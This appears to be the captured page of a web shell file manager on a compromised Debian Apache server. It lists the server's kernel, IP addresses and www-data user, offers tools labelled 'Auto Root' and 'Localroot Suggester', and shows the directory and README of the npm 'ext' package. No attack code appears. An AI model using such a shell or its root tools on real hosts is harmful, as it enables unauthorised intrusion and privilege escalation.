Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.152
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html_old /
iNetty /
node_modules /
ext /
Delete
Unzip
Name
Size
Permission
Date
Action
.github
[ DIR ]
drwxr-xr-x
2022-04-21 14:28
docs
[ DIR ]
drwxr-xr-x
2022-04-21 14:32
function
[ DIR ]
drwxr-xr-x
2022-04-21 14:28
global-this
[ DIR ]
drwxr-xr-x
2022-04-21 14:28
lib
[ DIR ]
drwxr-xr-x
2022-04-21 14:32
math
[ DIR ]
drwxr-xr-x
2022-04-21 14:28
node_modules
[ DIR ]
drwxr-xr-x
2022-04-21 14:32
object
[ DIR ]
drwxr-xr-x
2022-04-21 14:32
promise
[ DIR ]
drwxr-xr-x
2022-04-21 14:28
string
[ DIR ]
drwxr-xr-x
2022-04-21 14:28
string_
[ DIR ]
drwxr-xr-x
2022-04-21 14:32
test
[ DIR ]
drwxr-xr-x
2022-04-21 14:35
thenable_
[ DIR ]
drwxr-xr-x
2022-04-21 14:28
.editorconfig
288
B
-rw-r--r--
2022-04-21 14:25
CHANGELOG.md
3.21
KB
-rw-r--r--
2022-04-21 14:25
LICENSE
773
B
-rw-r--r--
2022-04-21 14:25
README.md
928
B
-rw-r--r--
2022-04-21 14:25
package.json
2.24
KB
-rw-r--r--
2022-04-21 14:25
Save
Rename
# ext _(Previously known as `es5-ext`)_ ## JavaScript language extensions (with respect to evolving standard) Non-standard or soon to be standard language utilities in a future proof, non-invasive form. Doesn't enforce transpilation step. Where it's applicable utilities/extensions are safe to use in all ES3+ implementations. ### Installation ```bash npm install ext ``` ### Utilities - [`globalThis`](docs/global-this.md) - `Function` - [`identity`](docs/function/identity.md) - `Math` - [`ceil10`](docs/math/ceil-10.md) - [`floor10`](docs/math/floor-10.md) - [`round10`](docs/math/round-10.md) - `Object` - [`clear`](docs/object/clear.md) - [`entries`](docs/object/entries.md) - `Promise` - [`limit`](docs/promise/limit.md) - `String` - [`random`](docs/string/random.md) - `String.prototype` - [`includes`](docs/string_/includes.md) - `Thenable.prototype` - [`finally`](docs/thenable_/finally.md)